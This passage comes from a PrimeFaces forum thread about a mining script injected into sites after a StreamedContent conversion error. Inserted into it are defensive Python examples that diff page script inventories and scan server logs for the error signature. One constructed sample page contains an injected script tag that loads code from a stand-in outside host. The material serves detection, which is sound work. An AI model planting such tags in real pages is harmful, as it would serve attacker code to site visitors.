 of type class java.lang.String to interface org.primefaces.model.StreamedContent
	at com.sun.el.lang.ELSupport.coerceToType(ELSupport.java:424)
	at com.sun.el.ExpressionFactoryImpl.coerceToType(ExpressionFactoryImpl.java:85)
	... 49 more
]]

Last edited by tak3shi on 15 Jan 2018, 23:56, edited 2 times in total.
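
Added example (not part of any post in this thread and not PrimeFaces code): the injected tags above load a script from a host that is not the site's own, and 452 reports that the script disappears after a container restart and returns hours later. One way to watch for that is to record the script inventory of a page right after a clean restart and compare later renderings against it. The function names, the URLs and both sample pages are constructed; query strings are ignored on the assumption that JSF resource URLs carry version parameters that vary.

```python
import hashlib
import re
from urllib.parse import urlsplit

# Attributes and body of every <script> element in the rendered page.
SCRIPT = re.compile(r"<script\b([^>]*)>(.*?)</script\s*>",
                    re.IGNORECASE | re.DOTALL)
# src="..." / src='...' / src=bare, but not data-src or similar.
SRC = re.compile(r"""(?<![\w-])src\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))""",
                 re.IGNORECASE)


def script_inventory(html, page_url):
    """Return the set of scripts a page carries.

    External files become ("src", origin, path), where origin is "self"
    for same-host or relative URLs. Inline scripts become
    ("inline", sha256 of the trimmed body).
    """
    page = urlsplit(page_url)
    items = set()
    for attrs, body in SCRIPT.findall(html):
        match = SRC.search(attrs)
        if match:
            src = next(g for g in match.groups() if g is not None)
            url = urlsplit(src)
            if url.netloc and url.netloc.lower() != page.netloc.lower():
                origin = f"{url.scheme or page.scheme}://{url.netloc.lower()}"
            else:
                origin = "self"
            items.add(("src", origin, url.path))
        elif body.strip():
            digest = hashlib.sha256(body.strip().encode("utf-8")).hexdigest()
            items.add(("inline", digest))
    return items


def new_scripts(baseline_html, current_html, page_url):
    """Scripts present in the current rendering but not in the baseline."""
    added = (script_inventory(current_html, page_url)
             - script_inventory(baseline_html, page_url))
    return sorted(added)


# Constructed sample pages: the baseline is the page as rendered right
# after a clean restart, the second one has two extra script elements.
PAGE_URL = "https://shop.example/index.xhtml"
BASELINE_HTML = (
    '<html><head><title>Shop</title>'
    '<script type="text/javascript" '
    'src="/javax.faces.resource/app.min.js.xhtml?ln=js"></script>'
    '</head><body></body></html>'
)
CURRENT_HTML = BASELINE_HTML.replace(
    "</title>",
    "</title>"
    '<script src="https://unlisted-host.example:7777/loader.js"></script>'
    "<script>/* constructed inline body */ start();</script>",
)

if __name__ == "__main__":
    for entry in new_scripts(BASELINE_HTML, CURRENT_HTML, PAGE_URL):
        print(entry)
```

Pages whose inline scripts legitimately change between requests need those entries excluded from the comparison; new external origins are the more reliable signal.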

Melloware
Posts: 3716
Joined: 22 Apr 2013, 15:48

15 Jan 2018, 23:16

OK and you are using PF 6.1 and are you using an Apache Web Server in front of your Payara server? Just trying to narrow down the relationship of how this script is getting injected.

tak3shi
Posts: 6
Joined: 25 Apr 2013, 22:58

15 Jan 2018, 23:24

I was wrong, one of my domains is using PrimeFaces 5.2.

Yes, I am running Apache in front with automatic security updates, and I just installed all other updates yesterday on Ubuntu 16.04.3 LTS (the hack was just some hours ago).

danielkohl
Posts: 33
Joined: 02 Apr 2012, 15:24

16 Jan 2018, 01:35

Yes, I can confirm this too.

Code:

[Server:frontend01] 23:22:14,785 SEVERE [org.primefaces.application.resource.StreamedContentHandler] (default task-29) Error in streaming dynamic resource. java.lang.IllegalArgumentException: Cannot convert
[Server:frontend01]
[Server:frontend01]
[Server:frontend01]
[Server:frontend01]
[Server:frontend01]
[Server:frontend01]
[Server:frontend01]
[Server:frontend01]
[Server:frontend01]
[Server:frontend01]  of type class java.lang.String to interface org.primefaces.model.StreamedContent

Copied "as found" in my log (including the empty lines; [Server:frontend01] is the node's name).
Right after this snippet the mining script is injected.


Thanks for your help and your time!
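
Added example (not part of any post in this thread and not PrimeFaces code): both posted logs show the same signature, a failed conversion of a String to org.primefaces.model.StreamedContent in which the String spans several otherwise empty log lines. The scanner below finds that signature in either log layout, rebuilds the multi-line value and collapses the "Caused by:" repeats of one stack trace. The function names and the sample log are constructed from the excerpts above.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Optional WildFly domain-mode prefix, e.g. "[Server:frontend01] ".
NODE_PREFIX = re.compile(r"^\[Server:(?P<node>[^\]]+)\] ?")
TIMESTAMP = re.compile(r"\b\d{2}:\d{2}:\d{2},\d{3}\b")
START = "Cannot convert"
# Tail of the coercion message: " of type <source type> to <target type>".
TAIL = re.compile(r" of type (?:class|interface) (?P<src>[\w.$]+)"
                  r" to (?:class|interface) (?P<dst>[\w.$]+)")
SOURCE = "java.lang.String"
TARGET = "org.primefaces.model.StreamedContent"
MAX_VALUE_LINES = 200  # assumption: stop if the message tail never shows up


@dataclass
class Hit:
    line_no: int              # 1-based line holding "Cannot convert"
    node: Optional[str]       # node name from the prefix, if any
    timestamp: Optional[str]  # HH:MM:SS,mmm if the line carries one
    value: str                # the String that could not be converted
    nested: bool              # True for "Caused by:" repeats in one trace


def _split(line: str) -> Tuple[Optional[str], str]:
    """Separate the optional node prefix from the rest of the line."""
    m = NODE_PREFIX.match(line)
    return (m.group("node"), line[m.end():]) if m else (None, line)


def find_failures(log_text: str) -> List[Hit]:
    lines = log_text.splitlines()
    hits, i = [], 0
    while i < len(lines):
        node, body = _split(lines[i])
        pos = body.find(START)
        if pos < 0:
            i += 1
            continue
        rest = body[pos + len(START):]
        # Drop the single space that separates "convert" from the value.
        parts = [rest[1:] if rest.startswith(" ") else rest]
        j, tail = i, TAIL.search(parts[0])
        # The value may span lines, so read on until the tail appears.
        while tail is None and j + 1 < len(lines) and j - i < MAX_VALUE_LINES:
            j += 1
            parts.append(_split(lines[j])[1])
            tail = TAIL.search(parts[-1])
        if (tail is not None and tail.group("src") == SOURCE
                and tail.group("dst") == TARGET):
            parts[-1] = parts[-1][:tail.start()]
            ts = TIMESTAMP.search(body)
            hits.append(Hit(i + 1, node, ts.group(0) if ts else None,
                            "\n".join(parts),
                            body.lstrip().startswith("Caused by:")))
        i = j + 1 if tail is not None else i + 1
    return hits


def summarize(log_text: str):
    """One row per failure: (line, node, time, line breaks in value, blank?)."""
    return [(h.line_no, h.node, h.timestamp, h.value.count("\n"),
             h.value.strip() == "")
            for h in find_failures(log_text) if not h.nested]


# Constructed sample shaped like the two excerpts posted in this thread,
# plus one unrelated conversion error that must not be reported.
SAMPLE_LOG = "\n".join([
    "[Server:frontend01] 23:21:58,102 INFO  [org.jboss.as] (default task-12) request served",
    "[Server:frontend01] 23:22:14,785 SEVERE [org.primefaces.application.resource."
    "StreamedContentHandler] (default task-29) Error in streaming dynamic resource. "
    "java.lang.IllegalArgumentException: Cannot convert",
    "[Server:frontend01]",
    "[Server:frontend01]",
    "[Server:frontend01]  of type class java.lang.String to interface " + TARGET,
    "java.io.IOException: javax.el.ELException: "
    "java.lang.IllegalArgumentException: Cannot convert ",
    "",
    " of type class java.lang.String to interface " + TARGET,
    "\tat org.primefaces.application.resource.StreamedContentHandler.handle"
    "(StreamedContentHandler.java:94)",
    "Caused by: java.lang.IllegalArgumentException: Cannot convert ",
    "",
    " of type class java.lang.String to interface " + TARGET,
    "java.lang.IllegalArgumentException: Cannot convert abc of type "
    "class java.lang.String to class java.lang.Integer",
])

if __name__ == "__main__":
    for row in summarize(SAMPLE_LOG):
        print(row)
```

Each reported row gives a point in time to correlate with the access log and with the moment the script first appears in served pages.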
